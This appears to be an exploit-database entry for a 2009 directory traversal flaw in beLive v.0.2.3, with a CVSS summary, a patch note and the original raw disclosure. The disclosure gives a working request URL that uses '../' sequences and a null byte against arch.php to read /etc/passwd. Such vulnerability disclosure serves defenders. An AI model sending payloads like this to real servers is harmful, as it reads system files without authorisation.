header-logo
Suggest Exploit
vendor:
beLive
by:
Kacper
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: beLive
Affected Version From: v.0.2.3
Affected Version To: v.0.2.3
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

beLive version: v.0.2.3

A directory traversal vulnerability exists in beLive version: v.0.2.3. An attacker can exploit this vulnerability to read arbitrary files from the server. This is done by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable server. This can be exploited to read sensitive files from the server, such as the /etc/passwd file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of beLive.
Source

Exploit-DB raw data:

Author: Kacper
Email: kacper1964@yahoo.pl

HomePage: http://devilteam.pl/

---------------

Script: beLive version: v.0.2.3

Vuln:
http://[page].pl/belive/arch.php?arch=../../../../../../../../etc/passwd%00

sorry ze tak malo napisane ale nie bylo czasu, wiecej na http://devilteam.pl/

THE END

-----------------------------------------

# milw0rm.com [2009-05-14]

Navigation

Suggest Exploit

Services By CQR